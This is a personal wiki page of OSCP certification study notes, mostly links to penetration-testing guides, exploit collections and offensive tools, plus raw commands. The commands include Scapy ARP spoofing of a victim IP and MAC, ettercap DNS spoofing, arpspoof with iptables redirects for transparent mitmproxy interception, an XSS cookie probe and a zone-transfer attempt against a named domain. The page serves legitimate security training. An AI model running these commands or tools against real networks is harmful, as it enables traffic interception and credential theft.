Offensive Security Certified Professional (OSCP)

Offensive Security Certified Professional (OSCP) is an ethical hacking certification offered by Offensive Security that teaches penetration testing methodologies and the use of the tools included with the BackTrack penetration testing distribution (now carried out with the Kali Linux distribution). The OSCP certification consists of a hands-on exam that requires successfully attacking and penetrating several machines in a safe, controlled environment. It is currently one of the few certifications that requires evidence of practical skills, in the form of a penetration test.

Preparation references

  • shi_ver_bot : A Telegram bot to see if your password was in the BreachCompilation

beef project

boca site, search: alert(document.cookie)</script>

https://www.netcraft.com/

https://www.seleniumhq.org/

https://panopticlick.eff.org/

https://beefproject.com/

dig @200.111.157.67 unap.cl -t AXFR

https://www.acunetix.com/

https://github.com/1N3/Sn1per

port knocking

https://blog.wpscans.com/sniff-wordpress-login-credentials-wireshark-http-connection/

https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ https://kali.training/lessons/introduction/

https://kali.training/topic/introduction-to-kali-linux/

https://www.offensive-security.com/information-security-certifications/oswe-offensive-security-web-expert/ https://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/ https://www.offensive-security.com/information-security-training/penetration-testing-training-kali-linux/

https://smarterworkspaces.kyocera.es/blog/certificacion-seguridad-informatica-cuales-las-principales/

(ip.addr == 10.168.40.145) and (!udp contains "HTTP/1.1")

https://tools.kali.org/information-gathering/nmap

ip.src == 192.168.0.99 && tcp.flags.syn==1 && tcp.flags.ack==1

https://3.14.by/en/md5

https://github.com/alearea51/IKn0wU

https://github.com/TunisianEagles/SocialBox

https://github.com/gentilkiwi/mimikatz https://github.com/AlessandroZ/LaZagne

https://github.com/reconSF/python/blob/master/Syngress.Violent.Python.a.Cookbook.for.Hackers.2013.pdf

https://github.com/vk496/linset

https://foro.seguridadwireless.net/manuales-de-wifislax-wifiway/manual-basico-de-wifislax-y-sus-herramientas-de-auditoria/

https://github.com/WifiPhisher

https://github.com/xtr4nge/FruityWifi

scapy

a = ARP(op="who-has", psrc="192.168.168.2", pdst="192.168.168.131", hwdst="fe80::4067:2e3f:d06:61bd")
send(a, inter=3, loop=1)

a = ARP(op="who-has", psrc="10.168.40.1", pdst="10.168.40.70", hwdst="fe80::4067:2e3f:d06:61bd")

10.168.40.1

IP to spoof, victim IP, victim MAC:
a = ARP(op="who-has", psrc="10.168.40.1", pdst="10.168.40.70", hwdst="08:00:27:52:2D:A0")

send(a, inter=3, loop=1)

ettercap

ettercap -T -q -i eth0 -P dns_spoof -M arp /10.168.40.145/// 

tcpdump -n -i wlan0 -e 'arp or icmp'

arping -c 1 -I wlan0 10.168.40.1
ARPING 10.168.40.1
60 bytes from 08:00:27:7e:b5:f7 (10.168.40.1): index=0 time=1.363 msec
60 bytes from 00:17:c5:15:81:6a (10.168.40.1): index=1 time=2.670 msec

--- 10.168.40.1 statistics ---

https://sandilands.info/sgordon/arp-spoofing-on-wired-lan

mitmproxy

arpspoof -i eth0 -t 10.168.40.70 10.168.40.1

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-port 8080

mitmproxy --mode transparent


bettercap -T ipvictima --proxy -P

https://github.com/byt3bl33d3r/MITMf https://backtrackacademy.com/articulo/saltando-hsts-con-man-in-the-middle-framework http://www.elladodelmal.com/2016/03/ataques-man-in-middle-hsts-sslstrip-2.html

https://www.trustwave.com/Resources/SpiderLabs-Blog/Changes-in-Oracle-Database-12c-password-hashes/

w3af http://exploitpack.com/


WIFI

https://github.com/xtr4nge/FruityC2


android https://github.com/M4sc3r4n0/Evil-Droid

extra

https://github.com/nixawk/pentest-wiki

https://geekflare.com/online-scan-website-security-vulnerabilities/

other

https://es.scribd.com/document/13213787/CUH-E-zine-4%C2%AA-Edicion

https://www.aircrack-ng.org/doku.php?id=es:aireplay-ng https://www.aircrack-ng.org/doku.php?id=es:deauthentication

https://www.offensive-security.com/metasploit-unleashed/

https://blog.segu-info.com.ar/2018/09/examen-de-prueba-para-estudiantes-del.html https://www.alienvault.com/blogs/security-essentials/how-to-prepare-to-take-the-oscp

OSCP

https://www.sniferl4bs.com/2015/11/entrenando-en-casa-para-rendir-el-oscp.html https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-1-is-oscp-for-you-b57cbcce7440 https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-2-workflow-and-documentation-tips-9dd335204a48 https://medium.com/@hakluke/haklukes-ultimate-oscp-guide-part-3-practical-hacking-tips-and-tricks-c38486f5fc97

https://support.offensive-security.com/#!pwk-support.md https://support.offensive-security.com/#!oscp-exam-guide.md

https://www.offensive-security.com/documentation/penetration-testing-with-kali.pdf https://www.securitysift.com/offsec-pwb-oscp/ https://www.adampalmer.me/iodigitalsec/2013/04/11/offensive-security-pwb-course-and-oscp-certification-review/

https://vcatalan.com/2017/01/OSCP-part-I-preparacion-estudio-previo.html

https://mytcpip.com/2017/08/10/taller-de-hacking-i-nmap-a-fondo-metasploit-basico/ https://null-byte.wonderhowto.com/forum/upload-shell-from-phpmyadmin-xampp-by-mohamed-ahmed-0179931/

https://www.exam-labs.com/exam/NSE4#tutorial

https://www.ihacklabs.com/es/el-mejor-sistema-de-pivoting-en-linux/

https://wiki.wireshark.org/SampleCaptures

https://www.ubuntupit.com/an-ultimate-list-of-ethical-hacking-and-penetration-testing-tools-for-kali-linux/?fbclid=IwAR2szRvngTnDw8X7sETTlDH7letMnJriTBNSWYe_P4t49VVScqdxS2gWhV8

https://openwall.info/wiki/

https://github.com/ibr2/pwk-cheatsheet

https://www.keiththome.com/oscp-course-review/

http://fl3x.us/blog/2015/09/22/order-wireless-devices-for-wifu-course/

https://amonsec.net/course/offensive-security-pwk-course-review

https://blog.g0tmi1k.com/2013/08/cracking-perimeter-ctp-offensive/

https://www.ihacklabs.com/es/certificacion-osce-review-cracking-the-perimeter-ctp/

http://www.vividmachines.com/shellcode/shellcode.html

https://www.securitysift.com/offsec-ctp-osce/

https://hackforums.net/member.php

http://nixware.net/my-osce-journey

http://www.cs.virginia.edu/~evans/cs216/guides/x86.html

https://www.pentesteracademy.com/topics

https://openwall.info/wiki/p_lkrg/Main

https://github.com/tanc7/hacking-books

https://github.com/tanc7

https://infosecuritygeek.com/vulnhub-kioptrix-2014/

http://www.securitysift.com/offsec-pwb-oscp/

https://xapax.gitbooks.io/security/content/

https://medium.com/@bondo.mike/ptp-lab-privilege-escalation-with-services-5d14a99a28d1

https://github.com/xapax/oscp

https://medium.com/@m4lv0id/and-i-did-oscp-589babbfea19

Cupp, for creating wordlists: git clone https://github.com/Mebus/cupp.git

Brute-force attacks against social networks: git clone https://github.com/TunisianEagles/SocialBox.git

Password dumping (memory dump): https://github.com/AlessandroZ/LaZagne

Cracking WPA/WPA2 with phishing: https://github.com/vk496/linset https://github.com/wifiphisher/wifiphisher

instabridge

--mode transparent

mitm.it/cert/p12

bettercap -T [ip_victima] --proxy -P

Evil-Droid git clone https://github.com/M4sc3r4n0/Evil-Droid.git

https://www.giuspen.com/cherrytree/

https://github.com/mikaelkall/HackingAllTheThings

https://www.vortex.id.au/2017/05/oscp-exam-preparation-exam-day-report-day/

https://github.com/P3t3rp4rk3r/OSCP-cheat-sheet-1

https://github.com/so87/OSCP-PwK

https://medium.com/@chennylmf/hackthebox-lame-c28b19558cb0

https://github.com/OlivierLaflamme/Cheatsheet-God

https://medium.com/@cymtrick/oscp-cheat-sheet-5b8aeae085ad

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

https://medium.com/@chennylmf/hackthebox-walkthrough-tartarsauce-810a8df296c1

http://www.fuzzysecurity.com/tutorials/16.html

Good reviews of CTP/OSCE (in no particular order):

Note: * mark means look for other posts on this blog

Tutorial sites (more stars = better/recommended):

Cheatsheets:

Good practice sites:

Vulnerable machines:

  • vulnhub VMs: SickOS 1.1, SickOS 1.2, Droopy v0.2, Kevgir, Pegasus, SecTalks: BNE0x00 - Minotaur, SecTalks: BNE0x03 - Simple, NullByte: 1, FristiLeaks 1.3
  • OWASP Vulnerable Web Applications Directory Project
  • Mutillidae
  • Damn Vulnerable Web Application

LFI/RFI https://penetrate.io/2014/01/10/from-rfi-to-shell/

Backdooring files with Python: https://github.com/secretsquirrel/the-backdoor-factory

eBooks downloads:

  • http://www.ebook777.com/gray-hat-hacking-ethical-hackers-handbook-fourth-edition/
  • https://github.com/JpGallegos/CySecBooks
  • https://www.securepla.net/the-hacker-playbook-2/
  • “Hacking: The Art of Exploitation”

https://www.linkedin.com/pulse/osce-cracking-perimeter-experience-sunny-neo

  • Fuzzing (Scapy, TAO, Sulley)
  • Linux Exploitation (vanilla stack overflow, return to Glibc - NX bypass, repairing stack canaries, ASLR bypasses) and Windows exploitation (SEH overwrite, Return Oriented Programming into disabling DEP)
  • Web Application Hacker's Handbook (might be too large: Consider “webgoat”)

Various sites:

  • http://www.sweetscape.com/ (010 Editor)
  • https://github.com/campagnola/pycca
  • https://github.com/Gallopsled/pwntools
  • https://github.com/reyammer/shellnoob
  • https://zeltser.com/convert-shellcode-to-assembly/
  • http://files.cnblogs.com/files/exclm/ollydbg_cmdline_cheat_sheet.pdf
  • http://bernardodamele.blogspot.sg/2011/09/reverse-shells-one-liners.html
  • https://www.digitalocean.com/community/tutorials/how-to-use-bash-history-commands-and-expansions-on-a-linux-vps
  • https://github.com/peterferrie/win-exec-calc-shellcode
  • http://www.secniu.com/why-my-shellcode-cannot-work/
  • http://thestarman.pcministry.com/asm/2bytejumps.htm
  • http://blog.noobroot.com/
  • https://www.exploit-db.com/exploits/5342/
  • http://exploit.co.il/hacking/manual-egghuntershellcode-encoding/
  • https://github.com/salcho/codetz
  • http://xangosec.blogspot.sg/2014/08/automating-sub-encoder.html
  • http://www.fuzzing.org/
  • http://resources.infosecinstitute.com/pattern-based-approach-memory-shellcodes-detection/
  • https://www.offensive-security.com/metasploit-unleashed/alphanumeric-shellcode/
  • https://0x41.no/hacking-networks-with-snmp/
  • http://danielebellavista.blogspot.sg/2014/10/ia32-shellcodes-get-eip-value.html
  • http://www.thepentesters.net/tutorials/tricks-escaping-linux-restricted-shells/
  • http://codemachine.com/downloads.html

Fun random stuff:

  • http://patriciopalladino.com/files/hieroglyphy/
  • http://n01g3l.tumblr.com/
  • https://twitter.com/ch3rn0byl/status/832681279900487680

https://blog.g0tmi1k.com/2012/02/kioptrix-level-4-sql-injection/

https://blog.g0tmi1k.com/2012/01/hackademic-rtb2/

https://github.com/vanhoefm/modwifi https://github.com/vanhoefm/blackhat17-pocs

https://github.com/0x90/uberscapy

https://github.com/0x90/wifi-arsenal https://github.com/0x90/kali-scripts

https://nets.ec/Main_Page https://old.exploit-db.com/exploits/13284/

https://packetstormsecurity.com/files/90146/Ascii-To-Shellcode-Encoder-Decoder-Tool.html

https://underc0de.org/foro/hacking/que-es-una-shellcode/

https://0x00sec.org/t/linux-shellcoding-part-1-0/289

https://github.com/Grazfather/PracticalMalwareLabs https://github.com/Grazfather/BlackHatPython

https://github.com/VulnHub/ctf-writeups

https://nullku7.github.io/stuff/vulnhub/walkthrough/2017/05/28/vulnhub-mr-robot.html

https://github.com/trustedsec

https://exploit.courses/#/challenges

https://payatu.com/guide-linux-privilege-escalation/

https://github.com/dobin/yookiterm-slides

https://exploit.courses/files/bfh2018/content.html

https://exploit.courses/files/bfh2017/content.html

https://systemoverlord.com/2017/10/24/building-a-home-lab-for-offensive-security-basics.html#pre-made-vms-tools

https://blog.vonhewitt.com/2018/08/oscp-exam-cram-log-aug-sept-oct-2018/

https://www.vortex.id.au/2017/05/pwkoscp-stack-buffer-overflow-practice/

https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html

https://www.exploit-db.com/exploits/44298

https://github.com/jivoi/pentest

https://github.com/lucyoa/kernel-exploits

https://n0where.net/

https://github.com/Manisso/fsociety
Fsociety Hacking Tools Pack. A Penetration Testing Framework, you will have every script that a hacker needs

Linux Kernel-Mode Rootkit Hunter for 4.4.0-31+. https://github.com/nbulischeck/tyton https://nbulischeck.github.io/tyton/

https://github.com/fireeye/flare-vm - FLARE VM - a fully customizable, Windows-based security distribution for malware analysis, incident response, penetration testing, etc.

https://github.com/frizb/Vanquish
Vanquish is a Kali Linux based Enumeration Orchestrator built in Python. Vanquish leverages the opensource enumeration tools on Kali to perform multiple active information gathering phases. The results of each phase are fed into the next phase to identify vulnerabilities that could be leveraged for a remote shell.

https://www.youtube.com/watch?v=YoNrNBnmwuY&feature=youtu.be

https://github.com/coreb1t/awesome-pentest-cheat-sheets

https://www.oracle.com/technetwork/community/developer-vm/index.html

https://github.com/buglessdr?tab=repositories

https://github.com/buglessdr/oscp-1

https://github.com/buglessdr/myarsenal

https://github.com/buglessdr/linux-exploit-suggester

https://github.com/buglessdr/OSCP-2

https://github.com/pentestmonkey

https://www.peerlyst.com/posts/ctf-virtual-machines-created-by-the-peerlyst-community-hack-these-peerlyst

https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki

https://github.com/ston3o/docker-hacklab

https://gist.github.com/jivoi/724e4b4b22501b77ef133edc63eba7b4

http://overthewire.org/wargames/

https://github.com/SecWiki/linux-kernel-exploits

https://www.pcihispano.com/cumplir-con-pci-dss-solamente-con-software-open-source-es-posible-aqui-te-explicamos-como-hacerlo/

https://opnsense.org/download/

https://www.peerlyst.com/posts/the-red-team-guide-chapter-11-privilege-escalation-haythem-arfaoui?utm_source=peerlyst_perspective&utm_medium=email&utm_content=peerlyst_post&utm_campaign=top_posts_on_peerlyst_this_week_01292019

https://github.com/thelinuxchoice?tab=repositories

https://pastebin.com/aqGvjhgB

https://github.com/osirislab/Hack-Night/

http://www.opensecuritytraining.info/Exploits1.html

http://www.opensecuritytraining.info/Exploits2.html

https://www.bebee.com/producer/@fran-brizzolis/ciberseguridad-en-pymes-administrando-sistemas-de-forma-segura-buenas-practicas

https://picoctf.com/resources

https://blog.osiris.cyber.nyu.edu/

https://www.hacker101.com/videos

seguridad/enlaces/certificaciones/oscp.1550584026.txt.gz · Last modified: 2019/02/19 13:47 by cayu